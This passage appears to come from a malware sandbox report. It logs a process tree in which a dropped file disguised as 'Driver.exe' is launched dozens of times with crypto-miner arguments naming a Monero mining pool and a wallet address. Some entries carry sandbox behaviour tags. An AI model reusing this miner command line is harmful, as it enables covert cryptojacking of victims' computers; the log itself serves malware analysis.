"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2080

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2996

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2972

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1264

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2320

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:916

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2564

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2260

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1976

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2472

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2228

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1340

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:944

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2972

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2636

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2572

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1736

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1380

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1880

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2244

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1924

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1596

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2780

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2364

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2980

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2376

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2752

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1736

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:340

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2084

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2136

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:896

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:948

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2304

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2728

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1920

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2784

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:280

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1540

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:740

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:936

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2164

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2992

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:840

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2672

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2880

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2332

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1516

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2584

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:3064

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2780

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2712

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1020

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2828

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:896

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1060

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2764

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1792

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2204

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2632

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2968

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2144

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2996

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:560

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1516

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:760

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2844

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:3060

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2572

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2340

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2504

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
